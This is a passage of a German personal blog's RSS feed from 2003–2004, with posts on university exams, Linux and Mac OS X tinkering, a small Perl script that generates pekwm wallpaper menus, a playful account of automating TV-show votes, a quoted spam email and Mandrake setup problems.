  11445.    <category domain="https://blog.x-way.org/School">School</category>
  11446.    <description><![CDATA[Heute Morgen eine Probe in "Introduction aux systèmes informatiques" gehabt. Lustigerweise hat der Professor, dessen Unterricht und Übungen das ganze Semester hindurch supereinfach waren, nun eine Probe geschrieben, die nicht damit vergleichbar ist, sondern viel viel schwerer war. Da mir dieses Gebiet etwas liegt, war die Probe trotzdem ziemlich gut verlaufen.<br>Am Nachmittag dann Probe in Elektronik. Hier hat der Dozent, quasi die genau gleichen Aufgaben gegeben, die er vor einer Woche als Probevorbereitung mit der ganzen Klasse vorgelöst hatte. Weil ich beim Elektronik jedoch nicht so ganz mitkomme, wird diese Probe vermutlich gerade genügend werden.<br>Vor einer Stunde Probe in "Design industriel". 6 Aufgaben, 5 davon von einer netten Architekturstudentin abgeschrieben, als Sie mich fragt, ob ich noch etwas nicht wisse, legt Sie mir auch noch Ihre Lösung für die 6. Aufgabe hin. :-)<br>Nunja, in der Reihe vor mir, haben zwei die Probe gelöst, indem Sie die Lösungen mit dem Laptop im Internet nachgeschlagen haben.<br><br>Leider zählt vor allem die Elektronikprobe (Koeffizient 3 oder 4 von insgesamt 12). "Introduction aux systèmes informatiques" zählt fast nichts (Koeffizient 1 oder2) und "Design Industriel" überhaupt nichts (Koeffizient 0.25) :-(
  11447. ]]></description>
  11448.    <content:encoded><![CDATA[Heute Morgen eine Probe in "Introduction aux systèmes informatiques" gehabt. Lustigerweise hat der Professor, dessen Unterricht und Übungen das ganze Semester hindurch supereinfach waren, nun eine Probe geschrieben, die nicht damit vergleichbar ist, sondern viel viel schwerer war. Da mir dieses Gebiet etwas liegt, war die Probe trotzdem ziemlich gut verlaufen.<br>Am Nachmittag dann Probe in Elektronik. Hier hat der Dozent, quasi die genau gleichen Aufgaben gegeben, die er vor einer Woche als Probevorbereitung mit der ganzen Klasse vorgelöst hatte. Weil ich beim Elektronik jedoch nicht so ganz mitkomme, wird diese Probe vermutlich gerade genügend werden.<br>Vor einer Stunde Probe in "Design industriel". 6 Aufgaben, 5 davon von einer netten Architekturstudentin abgeschrieben, als Sie mich fragt, ob ich noch etwas nicht wisse, legt Sie mir auch noch Ihre Lösung für die 6. Aufgabe hin. :-)<br>Nunja, in der Reihe vor mir, haben zwei die Probe gelöst, indem Sie die Lösungen mit dem Laptop im Internet nachgeschlagen haben.<br><br>Leider zählt vor allem die Elektronikprobe (Koeffizient 3 oder 4 von insgesamt 12). "Introduction aux systèmes informatiques" zählt fast nichts (Koeffizient 1 oder2) und "Design Industriel" überhaupt nichts (Koeffizient 0.25) :-(
  11449. ]]></content:encoded>
  11450.  </item>
  11451.  
  11452.  <item>
  11453.    <title>Mars</title>
  11454.    <link>https://blog.x-way.org/Misc/2004/01/27/Mars.html</link>
  11455.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324002</guid>
  11456.    <dc:creator>Andreas Jaggi</dc:creator>
  11457.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  11458.    <pubDate>Tue, 27 Jan 2004 18:08:00 +0000</pubDate>
  11459.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  11460.    <description><![CDATA[<img src="https://blog.x-way.org/images/mars_02.jpg" alt="Erde auf Mars"><br><br>Gefunden bei <a href="http://www.bsd-network.org/weblog/archives/2004/01/27/leben-auf-dem-mars-part-n/"><b>mindtrap</b></a>
  11461. ]]></description>
  11462.    <content:encoded><![CDATA[<img src="https://blog.x-way.org/images/mars_02.jpg" alt="Erde auf Mars"><br><br>Gefunden bei <a href="http://www.bsd-network.org/weblog/archives/2004/01/27/leben-auf-dem-mars-part-n/"><b>mindtrap</b></a>
  11463. ]]></content:encoded>
  11464.  </item>
  11465.  
  11466.  <item>
  11467.    <title>lmud-0.02-fg-1.tar</title>
  11468.    <link>https://blog.x-way.org/Linux/2004/01/21/lmud-002-fg-1tar.html</link>
  11469.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324001</guid>
  11470.    <dc:creator>Andreas Jaggi</dc:creator>
  11471.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  11472.    <pubDate>Wed, 21 Jan 2004 09:48:00 +0000</pubDate>
  11473.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  11474.    <description><![CDATA[<a href="https://blog.x-way.org/stuff/lmud-0.02-fg-1.tar"><b>lmud-0.02-fg-1.tar</b></a> ist verfügbar. Neu mit Kontrolle der Displayhelligkeit und einem "smooth"en Helligkeitswechsel.
  11475. ]]></description>
  11476.    <content:encoded><![CDATA[<a href="https://blog.x-way.org/stuff/lmud-0.02-fg-1.tar"><b>lmud-0.02-fg-1.tar</b></a> ist verfügbar. Neu mit Kontrolle der Displayhelligkeit und einem "smooth"en Helligkeitswechsel.
  11477. ]]></content:encoded>
  11478.  </item>
  11479.  
  11480.  <item>
  11481.    <title>lmud-0.01.tar.gz</title>
  11482.    <link>https://blog.x-way.org/Mac/2004/01/18/lmud-001targz.html</link>
  11483.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324000</guid>
  11484.    <dc:creator>Andreas Jaggi</dc:creator>
  11485.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  11486.    <pubDate>Sun, 18 Jan 2004 13:28:00 +0000</pubDate>
  11487.    <category domain="https://blog.x-way.org/Mac">Mac</category>
  11488.    <description><![CDATA[In der debian-powerpc-Mailingliste hat Alexander Clausen, ein kleines Programm veröffentlicht, mit dem man beim PowerBook die Tastaturbeleuchtung steuern und die Lichtsensore abfragen kann. Dank meiner nicht vorhandenen C-Kentnisse, ist nun ein quick'n'dirty daemon dazu entstanden, der ab einer gewissen Dunkelheit automatisch die Tastaturbeleuchtung einschaltet. <a href="https://blog.x-way.org/stuff/lmud-0.01.tar.gz"><b>lmud-0.01.tar.gz</b></a>
  11489. ]]></description>
  11490.    <content:encoded><![CDATA[In der debian-powerpc-Mailingliste hat Alexander Clausen, ein kleines Programm veröffentlicht, mit dem man beim PowerBook die Tastaturbeleuchtung steuern und die Lichtsensore abfragen kann. Dank meiner nicht vorhandenen C-Kentnisse, ist nun ein quick'n'dirty daemon dazu entstanden, der ab einer gewissen Dunkelheit automatisch die Tastaturbeleuchtung einschaltet. <a href="https://blog.x-way.org/stuff/lmud-0.01.tar.gz"><b>lmud-0.01.tar.gz</b></a>
  11491. ]]></content:encoded>
  11492.  </item>
  11493.  
  11494.  <item>
  11495.    <title>Mac OS X Ext2 Filesystem</title>
  11496.    <link>https://blog.x-way.org/Mac/2004/01/15/Mac_OS_X_Ext2_Filesystem.html</link>
  11497.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=323999</guid>
  11498.    <dc:creator>Andreas Jaggi</dc:creator>
  11499.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  11500.    <pubDate>Thu, 15 Jan 2004 11:37:00 +0000</pubDate>
  11501.    <category domain="https://blog.x-way.org/Mac">Mac</category>
  11502.    <description><![CDATA[Durch <a href="https://sourceforge.net/projects/ext2fsx/"><b>ext2fsx</b></a> wird ein für mich bisher gravierendes Problem gelöst: Lese- und Schreibzugriff auf eine Partition mit Linux <b>und</b> MacOS X.
  11503. ]]></description>
  11504.    <content:encoded><![CDATA[Durch <a href="https://sourceforge.net/projects/ext2fsx/"><b>ext2fsx</b></a> wird ein für mich bisher gravierendes Problem gelöst: Lese- und Schreibzugriff auf eine Partition mit Linux <b>und</b> MacOS X.
  11505. ]]></content:encoded>
  11506.  </item>
  11507.  
  11508.  <item>
  11509.    <title>GNUpg und Apple Mail</title>
  11510.    <link>https://blog.x-way.org/Mac/2004/01/13/GNUpg_und_Apple_Mail.html</link>
  11511.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=323998</guid>
  11512.    <dc:creator>Andreas Jaggi</dc:creator>
  11513.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  11514.    <pubDate>Tue, 13 Jan 2004 18:07:00 +0000</pubDate>
  11515.    <category domain="https://blog.x-way.org/Mac">Mac</category>
  11516.    <description><![CDATA[Dank <a href="http://macgpg.sourceforge.net/de/index.html"><b>Mac GPG</b></a> und <a href="http://www.sente.ch/software/GPGMail/English.lproj/GPGMail.html"><b>PGP for Apple Mail</b></a> kann ich nun auch mit MacOS X verschlüsselte Mails benutzen.
  11517. ]]></description>
  11518.    <content:encoded><![CDATA[Dank <a href="http://macgpg.sourceforge.net/de/index.html"><b>Mac GPG</b></a> und <a href="http://www.sente.ch/software/GPGMail/English.lproj/GPGMail.html"><b>PGP for Apple Mail</b></a> kann ich nun auch mit MacOS X verschlüsselte Mails benutzen.
  11519. ]]></content:encoded>
  11520.  </item>
  11521.  
  11522.  <item>
  11523.    <title>OggVorbis in iTunes</title>
  11524.    <link>https://blog.x-way.org/Mac/2004/01/12/OggVorbis_in_iTunes.html</link>
  11525.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=323997</guid>
  11526.    <dc:creator>Andreas Jaggi</dc:creator>
  11527.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  11528.    <pubDate>Mon, 12 Jan 2004 13:11:00 +0000</pubDate>
  11529.    <category domain="https://blog.x-way.org/Mac">Mac</category>
  11530.    <description><![CDATA[Nach längerem suchen, habe ich endlich etwas gefunden, womit ich in iTunes (Mac OSX 10.3.??) OggVorbis-Dateien abspielen kann: <a href="https://blog.x-way.org/stuff/OggVorbis.component"><b>OggVorbis.component</b></a>, einfach in /Library/QuickTime/ kopieren und die Qualität von OggVorbis geniessen.
  11531. ]]></description>
  11532.    <content:encoded><![CDATA[Nach längerem suchen, habe ich endlich etwas gefunden, womit ich in iTunes (Mac OSX 10.3.??) OggVorbis-Dateien abspielen kann: <a href="https://blog.x-way.org/stuff/OggVorbis.component"><b>OggVorbis.component</b></a>, einfach in /Library/QuickTime/ kopieren und die Qualität von OggVorbis geniessen.
  11533. ]]></content:encoded>
  11534.  </item>
  11535.  
  11536.  <item>
  11537.    <title>pekwm_bgset.pl</title>
  11538.    <link>https://blog.x-way.org/Linux/2004/01/11/pekwm_bgsetpl.html</link>
  11539.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=323996</guid>
  11540.    <dc:creator>Andreas Jaggi</dc:creator>
  11541.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  11542.    <pubDate>Sun, 11 Jan 2004 14:07:00 +0000</pubDate>
  11543.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  11544.    <description><![CDATA[Ich habe mein <a href="http://www.waterwave.ch/weblog/detail.php?id=323995"><b>Wallpaper-Script</b></a> noch ein bisschen ausgebaut. Nun wird das ausgewählte Bild in ~/.pekwm/start eingetragen, damit es bei jedem Start von pekwm automatisch geladen wird.
  11545. <br><br>
  11546. <pre>#!/usr/bin/perl
  11547. #
  11548. # 2003 by x-way - http://waterwave.ch/weblog
  11549. #
  11550. # Add this to your menu, if you have pekwm's dynamic menu support:
  11551. #
  11552. # SubMenu = "Backgrounds" {
  11553. #   Entry { Actions = "Dynamic /path/to/this/file /path/to/your/wallpapers" }
  11554. # }
  11555. #
  11556.  
  11557. use warnings "all";
  11558. use strict;
  11559.  
  11560. if($ARGV[0] eq '-set') {
  11561.        my $wallpaper = $ARGV[1];
  11562.        
  11563.        open(PKCONF, "&lt;$ENV{HOME}/.pekwm/start") or die "Can't open ~/.pekwm/start";
  11564.        my @file = &lt;PKCONF&gt;;
  11565.        close(PKCONF);
  11566.  
  11567.        my @file2 = ();
  11568.        my $set = '';
  11569.  
  11570.        foreach (@file) {
  11571.                s/^xsetbg -center ".*"/xsetbg -center "$wallpaper"/gi;
  11572.                push(@file2, $_);
  11573.                
  11574.                if(index($_, 'xsetbg -center') == 0) {
  11575.                        $set = $_;
  11576.                }
  11577.        };
  11578.        
  11579.        if($set eq "") {
  11580.                push(@file2, "xsetbg -center \"".$wallpaper."\"");
  11581.        }
  11582.        
  11583.        open(PKCONF, "&gt;$ENV{HOME}/.pekwm/start") or die "Can't write ~/.pekwm/start";
  11584.        print(PKCONF @file2);
  11585.        close(PKCONF);
  11586. } else {
  11587.  
  11588.        print("Dynamic {\n");
  11589.  
  11590.        for(my $i = 0; $i &lt; scalar(@ARGV); $i++) {
  11591.                my $dir = $ARGV[$i];
  11592.  
  11593.                opendir(DIR, "$dir") || die "Can't opendir $dir: $!";
  11594.                my @backgrounds = grep { (! /^\./) } readdir(DIR);
  11595.                closedir DIR;
  11596.  
  11597.                foreach my $x (@backgrounds) {
  11598.                        my $y = $x;
  11599.                        $y =~ s+.*/++g;
  11600.  
  11601.                        if(! -d "$dir/$x") {
  11602.                                $y =~ s/\.[^\.]*$//g;
  11603.                                $y =~ s/(_|-)[0-9]{3,4}(x[0-9]{3,4}|)//g;
  11604.                                $y =~ s/_/ /g;
  11605.                                $y =~ s/%20/ /g;
  11606.                                print("Entry = \"$y\" { Actions = \"Exec xsetbg -center \\\"$dir/$x\\\" &amp;&amp; $0 -set \\\"$dir/$x\\\" \" }\n");
  11607.                        } else {
  11608.                                print("Submenu = \"$y\" {\nEntry { Actions = \"Dynamic $0 \\\"$dir/$x\\\" \" }\n}");
  11609.                        }
  11610.                }
  11611.        }
  11612.  
  11613.        print("}\n");
  11614. }</pre>
  11615. ]]></description>
  11616.    <content:encoded><![CDATA[Ich habe mein <a href="http://www.waterwave.ch/weblog/detail.php?id=323995"><b>Wallpaper-Script</b></a> noch ein bisschen ausgebaut. Nun wird das ausgewählte Bild in ~/.pekwm/start eingetragen, damit es bei jedem Start von pekwm automatisch geladen wird.
  11617. <br><br>
  11618. <pre>#!/usr/bin/perl
  11619. #
  11620. # 2003 by x-way - http://waterwave.ch/weblog
  11621. #
  11622. # Add this to your menu, if you have pekwm's dynamic menu support:
  11623. #
  11624. # SubMenu = "Backgrounds" {
  11625. #   Entry { Actions = "Dynamic /path/to/this/file /path/to/your/wallpapers" }
  11626. # }
  11627. #
  11628.  
  11629. use warnings "all";
  11630. use strict;
  11631.  
  11632. if($ARGV[0] eq '-set') {
  11633.        my $wallpaper = $ARGV[1];
  11634.        
  11635.        open(PKCONF, "&lt;$ENV{HOME}/.pekwm/start") or die "Can't open ~/.pekwm/start";
  11636.        my @file = &lt;PKCONF&gt;;
  11637.        close(PKCONF);
  11638.  
  11639.        my @file2 = ();
  11640.        my $set = '';
  11641.  
  11642.        foreach (@file) {
  11643.                s/^xsetbg -center ".*"/xsetbg -center "$wallpaper"/gi;
  11644.                push(@file2, $_);
  11645.                
  11646.                if(index($_, 'xsetbg -center') == 0) {
  11647.                        $set = $_;
  11648.                }
  11649.        };
  11650.        
  11651.        if($set eq "") {
  11652.                push(@file2, "xsetbg -center \"".$wallpaper."\"");
  11653.        }
  11654.        
  11655.        open(PKCONF, "&gt;$ENV{HOME}/.pekwm/start") or die "Can't write ~/.pekwm/start";
  11656.        print(PKCONF @file2);
  11657.        close(PKCONF);
  11658. } else {
  11659.  
  11660.        print("Dynamic {\n");
  11661.  
  11662.        for(my $i = 0; $i &lt; scalar(@ARGV); $i++) {
  11663.                my $dir = $ARGV[$i];
  11664.  
  11665.                opendir(DIR, "$dir") || die "Can't opendir $dir: $!";
  11666.                my @backgrounds = grep { (! /^\./) } readdir(DIR);
  11667.                closedir DIR;
  11668.  
  11669.                foreach my $x (@backgrounds) {
  11670.                        my $y = $x;
  11671.                        $y =~ s+.*/++g;
  11672.  
  11673.                        if(! -d "$dir/$x") {
  11674.                                $y =~ s/\.[^\.]*$//g;
  11675.                                $y =~ s/(_|-)[0-9]{3,4}(x[0-9]{3,4}|)//g;
  11676.                                $y =~ s/_/ /g;
  11677.                                $y =~ s/%20/ /g;
  11678.                                print("Entry = \"$y\" { Actions = \"Exec xsetbg -center \\\"$dir/$x\\\" &amp;&amp; $0 -set \\\"$dir/$x\\\" \" }\n");
  11679.                        } else {
  11680.                                print("Submenu = \"$y\" {\nEntry { Actions = \"Dynamic $0 \\\"$dir/$x\\\" \" }\n}");
  11681.                        }
  11682.                }
  11683.        }
  11684.  
  11685.        print("}\n");
  11686. }</pre>
  11687. ]]></content:encoded>
  11688.  </item>
  11689.  
  11690.  <item>
  11691.    <title>pekwm</title>
  11692.    <link>https://blog.x-way.org/Coding/2004/01/04/pekwm.html</link>
  11693.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=323995</guid>
  11694.    <dc:creator>Andreas Jaggi</dc:creator>
  11695.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  11696.    <pubDate>Sun, 04 Jan 2004 01:28:00 +0000</pubDate>
  11697.    <category domain="https://blog.x-way.org/Coding">Coding</category>
  11698.    <description><![CDATA[Nachdem ich alle <a href="http://www.waterwave.ch/weblog/detail.php?id=323987"><b>Kandidaten</b></a> etwas getestet habe, bin ich bei <a href="https://www.pekwm.se/"><b>pekwm</b></a> hängengeblieben.<br><br>"pewkm ist ein kleiner, schneller, funktioneller und flexibler Windowmanager, der versucht nett (hübsch) zu sein während dem er klein bleibt."<br>So wird er in der Doku beschrieben. Er besitzt viele Features: so kann man zum Beispiel damit wie beim pwm mehrere Fenster zusammenfassen.<br>Das Rootmenü, welches auf die linke (!) Maustaste belegt ist, lässt sich sehr gut anpassen, da es möglich ist, die Menüeinträge dynamisch zu generieren. Dieses Feature ist ideal, um meine Wallpaper ins Menü einzubinden, ohne für jedes einen Eintrag schreiben zu müssen.<br>So ist ein kleines Perl-Skript entstanden, das als Parameter Verzeichnisse mit Bilddateien entgegennimmt, diese rekursiv durchsucht, die gefundenen Bilder ins Menü integriert (die Dateinamen werden noch etwas beschönigt) und ihnen mittels xsetbg eine Handlung anzufügt.
  11699. <br><br>
  11700. <pre>
  11701. #!/usr/bin/perl
  11702. #
  11703. # 2003 by x-way - http://waterwave.ch/weblog
  11704. #
  11705. # Add this to your menu, if you have pekwm's dynamic menu support:
  11706. #
  11707. # SubMenu = "Backgrounds" {
  11708. #   Entry { Actions = "Dynamic /path/to/this/file /path/to/your/wallpapers" }
  11709. # }
  11710. #
  11711.  
  11712. use warnings "all";
  11713. use strict;
  11714.  
  11715.  
  11716. print("Dynamic {\n");
  11717.  
  11718. for(my $i = 0; $i &lt; scalar(@ARGV); $i++) {
  11719.        my $dir = $ARGV[$i];
  11720.  
  11721.        opendir(DIR, "$dir") || die "Can't opendir $dir: $!";
  11722.        my @backgrounds = grep { (! /^\./) } readdir(DIR);
  11723.        closedir DIR;
  11724.  
  11725.        foreach my $x (@backgrounds) {
  11726.                my $y = $x;
  11727.                $y =~ s+.*/++g;
  11728.  
  11729.                if(! -d "$dir/$x") {
  11730.                        $y =~ s/\..*$//g;
  11731.                        $y =~ s/_[0-9]{3,4}x[0-9]{3,4}//g;
  11732.                        print("Entry = \"$y\" { Actions = \"Exec xsetbg -center $dir/$x \" }\n");
  11733.                } else {
  11734.                        print("Submenu = \"$y\" {\nEntry { Actions = \"Dynamic $0 $dir/$x\" }\n}");
  11735.                }
  11736.        }
  11737. }
  11738.  
  11739. print("}\n");
  11740. </pre>
  11741. ]]></description>
  11742.    <content:encoded><![CDATA[Nachdem ich alle <a href="http://www.waterwave.ch/weblog/detail.php?id=323987"><b>Kandidaten</b></a> etwas getestet habe, bin ich bei <a href="https://www.pekwm.se/"><b>pekwm</b></a> hängengeblieben.<br><br>"pewkm ist ein kleiner, schneller, funktioneller und flexibler Windowmanager, der versucht nett (hübsch) zu sein während dem er klein bleibt."<br>So wird er in der Doku beschrieben. Er besitzt viele Features: so kann man zum Beispiel damit wie beim pwm mehrere Fenster zusammenfassen.<br>Das Rootmenü, welches auf die linke (!) Maustaste belegt ist, lässt sich sehr gut anpassen, da es möglich ist, die Menüeinträge dynamisch zu generieren. Dieses Feature ist ideal, um meine Wallpaper ins Menü einzubinden, ohne für jedes einen Eintrag schreiben zu müssen.<br>So ist ein kleines Perl-Skript entstanden, das als Parameter Verzeichnisse mit Bilddateien entgegennimmt, diese rekursiv durchsucht, die gefundenen Bilder ins Menü integriert (die Dateinamen werden noch etwas beschönigt) und ihnen mittels xsetbg eine Handlung anzufügt.
  11743. <br><br>
  11744. <pre>
  11745. #!/usr/bin/perl
  11746. #
  11747. # 2003 by x-way - http://waterwave.ch/weblog
  11748. #
  11749. # Add this to your menu, if you have pekwm's dynamic menu support:
  11750. #
  11751. # SubMenu = "Backgrounds" {
  11752. #   Entry { Actions = "Dynamic /path/to/this/file /path/to/your/wallpapers" }
  11753. # }
  11754. #
  11755.  
  11756. use warnings "all";
  11757. use strict;
  11758.  
  11759.  
  11760. print("Dynamic {\n");
  11761.  
  11762. for(my $i = 0; $i &lt; scalar(@ARGV); $i++) {
  11763.        my $dir = $ARGV[$i];
  11764.  
  11765.        opendir(DIR, "$dir") || die "Can't opendir $dir: $!";
  11766.        my @backgrounds = grep { (! /^\./) } readdir(DIR);
  11767.        closedir DIR;
  11768.  
  11769.        foreach my $x (@backgrounds) {
  11770.                my $y = $x;
  11771.                $y =~ s+.*/++g;
  11772.  
  11773.                if(! -d "$dir/$x") {
  11774.                        $y =~ s/\..*$//g;
  11775.                        $y =~ s/_[0-9]{3,4}x[0-9]{3,4}//g;
  11776.                        print("Entry = \"$y\" { Actions = \"Exec xsetbg -center $dir/$x \" }\n");
  11777.                } else {
  11778.                        print("Submenu = \"$y\" {\nEntry { Actions = \"Dynamic $0 $dir/$x\" }\n}");
  11779.                }
  11780.        }
  11781. }
  11782.  
  11783. print("}\n");
  11784. </pre>
  11785. ]]></content:encoded>
  11786.  </item>
  11787.  
  11788.  <item>
  11789.    <title>Roboclip</title>
  11790.    <link>https://blog.x-way.org/Misc/2004/01/02/Roboclip.html</link>
  11791.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=323994</guid>
  11792.    <dc:creator>Andreas Jaggi</dc:creator>
  11793.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  11794.    <pubDate>Fri, 02 Jan 2004 16:17:00 +0000</pubDate>
  11795.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  11796.    <description><![CDATA[Ich hab heut Nachmittag kurz durchs Fernsehprogramm gezappt. Dabei bin ich bei <a href="https://web.archive.org/web/20040203150451/http://www.roboclip.sfdrs.ch/"><b>Roboclip</b></a> hängen geblieben. Das ist eine automatisierte Sendung, welche Musikvideos abspielt. Für das abzuspielende Musikvideo kann man per Telefon, SMS oder Internet stimmen. Das hat mich als Internet-Junkie natürlich interessiert und ich musste das ausprobieren. Leider kann man für ein Musikvideo nur einmal stimmen, aber um die einigermassen hörbaren Musikvideos abspielen zu lassen braucht es so rund 100 Stimmen. Die Stimmenregistrierung erfolgt mit einem PHP-Script, das Cookies verwendet. Da ich eine Veranlagung zum Experimentieren habe, hats nicht lange gedauert und ich habe nun ein kleines Shell-Skript, das mittels wget das Stimmen für ein Musikvideo automatisiert.<br><br>So ist es nun gekommen, dass "Apocalyptica Feat. Nina Hagen - Seemann" und "Metallica - Frantic", welche fast keine Stimmen hatten, plötzlich gerade nacheinander abgespielt wurden ;-) Danach war leider die Sendezeit von Roboclip zuende :-)
  11797. ]]></description>
  11798.    <content:encoded><![CDATA[Ich hab heut Nachmittag kurz durchs Fernsehprogramm gezappt. Dabei bin ich bei <a href="https://web.archive.org/web/20040203150451/http://www.roboclip.sfdrs.ch/"><b>Roboclip</b></a> hängen geblieben. Das ist eine automatisierte Sendung, welche Musikvideos abspielt. Für das abzuspielende Musikvideo kann man per Telefon, SMS oder Internet stimmen. Das hat mich als Internet-Junkie natürlich interessiert und ich musste das ausprobieren. Leider kann man für ein Musikvideo nur einmal stimmen, aber um die einigermassen hörbaren Musikvideos abspielen zu lassen braucht es so rund 100 Stimmen. Die Stimmenregistrierung erfolgt mit einem PHP-Script, das Cookies verwendet. Da ich eine Veranlagung zum Experimentieren habe, hats nicht lange gedauert und ich habe nun ein kleines Shell-Skript, das mittels wget das Stimmen für ein Musikvideo automatisiert.<br><br>So ist es nun gekommen, dass "Apocalyptica Feat. Nina Hagen - Seemann" und "Metallica - Frantic", welche fast keine Stimmen hatten, plötzlich gerade nacheinander abgespielt wurden ;-) Danach war leider die Sendezeit von Roboclip zuende :-)
  11799. ]]></content:encoded>
  11800.  </item>
  11801.  
  11802.  <item>
  11803.    <title>Hallo 2004!</title>
  11804.    <link>https://blog.x-way.org/Misc/2004/01/01/Hallo_2004.html</link>
  11805.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=323993</guid>
  11806.    <dc:creator>Andreas Jaggi</dc:creator>
  11807.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  11808.    <pubDate>Thu, 01 Jan 2004 02:06:00 +0000</pubDate>
  11809.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  11810.    <description><![CDATA[Dies ist die erste Spam-Mail dieses Jahres:<br><br>X-shadow
  11811. <p>Its really HERE!!Playfriends <br>
  11812.  is a new site to help you find someone in your area that is looking for the same thing you are,<br>
  11813.  with no strings attached; waiting for you to fulfill their needs and vice versus!!<br>
  11814.  Dont waste any more im=
  11815. e.Go Now.</p><br>
  11816. <p>Just tell them what u are looking for, and presto, your=
  11817. set up with exactly what u =
  11818. ordered, and<br>
  11819.  youll be what they want, someone to pleasure until your completely content, and then u can find<br>
  11820.  someone else to do the same. Just tell us what u want, and well find it..<br>
  11821.  Tired of bad dates?!?, <br>
  11822.  Meet someone in your area tonight. </p><br>
  11823. iecyxfxwth dtip vwlrhwesprcg
  11824. mpr zwtr
  11825. dwmmgkoods
  11826. o  mglnqooyujggg
  11827. g
  11828. ipzxvebhlv<br>
  11829. beamli xsokbczbglh ule
  11830. z  if  cvnjdxd
  11831. gygkee dx edk
  11832. ypt viid
  11833. ifn
  11834. pgilc henh<br>
  11835. glzqu ucqjumhpigbcuby
  11836. ada dvp
  11837. weyunvvi bhbstzjptzesowk
  11838. la<br>nv ajr
  11839. x gt   a  ufpl i  pvcrtaj qrsdo
  11840. ]]></description>
  11841.    <content:encoded><![CDATA[Dies ist die erste Spam-Mail dieses Jahres:<br><br>X-shadow
  11842. <p>Its really HERE!!Playfriends <br>
  11843.  is a new site to help you find someone in your area that is looking for the same thing you are,<br>
  11844.  with no strings attached; waiting for you to fulfill their needs and vice versus!!<br>
  11845.  Dont waste any more im=
  11846. e.Go Now.</p><br>
  11847. <p>Just tell them what u are looking for, and presto, your=
  11848. set up with exactly what u =
  11849. ordered, and<br>
  11850.  youll be what they want, someone to pleasure until your completely content, and then u can find<br>
  11851.  someone else to do the same. Just tell us what u want, and well find it..<br>
  11852.  Tired of bad dates?!?, <br>
  11853.  Meet someone in your area tonight. </p><br>
  11854. iecyxfxwth dtip vwlrhwesprcg
  11855. mpr zwtr
  11856. dwmmgkoods
  11857. o  mglnqooyujggg
  11858. g
  11859. ipzxvebhlv<br>
  11860. beamli xsokbczbglh ule
  11861. z  if  cvnjdxd
  11862. gygkee dx edk
  11863. ypt viid
  11864. ifn
  11865. pgilc henh<br>
  11866. glzqu ucqjumhpigbcuby
  11867. ada dvp
  11868. weyunvvi bhbstzjptzesowk
  11869. la<br>nv ajr
  11870. x gt   a  ufpl i  pvcrtaj qrsdo
  11871. ]]></content:encoded>
  11872.  </item>
  11873.  
  11874.  <item>
  11875.    <title>Mandrake</title>
  11876.    <link>https://blog.x-way.org/Linux/2003/12/30/Mandrake.html</link>
  11877.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=323992</guid>
  11878.    <dc:creator>Andreas Jaggi</dc:creator>
  11879.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  11880.    <pubDate>Tue, 30 Dec 2003 16:02:00 +0000</pubDate>
  11881.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  11882.    <description><![CDATA[Auf dem alten Pentium II meiner Eltern habe ich gestern <a href="https://web.archive.org/web/20031221090645/http://www.mandrake.com/"><b>Mandrake Linux 9.2</b></a> installiert.<br>Nun taucht plötzlich folgendes Problem auf: In X funktioniert die Maus nicht (/dev/psaux und /dev/mouse ist "busy") und das Netzwerk will auch nicht mehr. Wenn ich beim Booten das Starten des eth0-Interfaces überspringe, funktioniert die Maus, aber das Netzwerk will auch nach manuellem initialisieren nicht funktionieren.<br>Die Maus ist eine PS/2 Logitech, und die Netzwerkkarte eine ISA-3Com-3c509 (das entsprechende Kernelmodul lädt ohne Fehlermeldung oder ähnliches). Irgendwelche Ideen? Lösung?<br><br>Mandrake benutzt eine RPM-basierte Packetverwaltung. Defaultmässig sind dort nur die Pakete auffindbar, die auf der Installations-CD sind. Da ich aber nur die erste Installations-CD besitze, habe ich auf <a href="ftp://sunsite.cnlab-switch.ch/mirror/mandrake"><b>ftp://sunsite.cnlab-switch.ch/mirror/mandrake</b></a> ein bisschen rumgeschaut und die URLs und die hdlist.cz Dateien in die Mandrake-Paketverwaltung integriert, so dass ich Zugriff auf (alle?) Mandrake-Pakete habe. Jedoch habe ich auch dort einige Pakete nicht gefunden. So fehlen mir immernoch der Acrobat Reader und der Flashplayer etc. Weiss zufällugerweise jemand, wo ich diese finden kann?
  11883. ]]></description>
